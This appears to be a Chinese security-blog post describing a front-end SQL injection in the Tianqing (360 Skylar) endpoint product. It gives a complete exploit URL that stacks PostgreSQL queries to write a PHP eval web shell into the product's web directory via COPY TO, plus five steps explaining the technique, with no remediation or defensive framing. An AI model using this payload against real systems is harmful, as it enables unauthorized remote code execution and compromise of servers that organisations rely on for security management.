[2021你懂的]天擎-前台sql注入(新)

  • A+
所属分类:安全文章

注入shell:

https://192.168.24.196:8443/api/dp/rptsvcsyncpoint?ccid=1';create table O(T TEXT);insert into O(T) values('<?php @eval($_POST[1]);?>');copy O(T) to 'C:Program Files (x86)360skylar6www1.php';drop table O;--

利用过程:

1. 通过安装包安装的一般都有root权限,因此该注入点可尝试写shell

2. 通过注入点,创建一张表

3. 为表添加一个新字段 T 并且写入shell内容

4. Postgres数据库 使用COPY TO把一个表的所有内容都拷贝到一个文件(完成写shell)

5. 删除表

相关推荐: Apache Solr 任意文件读取漏洞

点击蓝字关注我们声明本文作者:PeiQi本文字数:1594阅读时长:5min附件/链接:点击查看原文下载本文属于【狼组安全社区】原创奖励计划,未经许可禁止转载由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,狼组安全团队以…

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: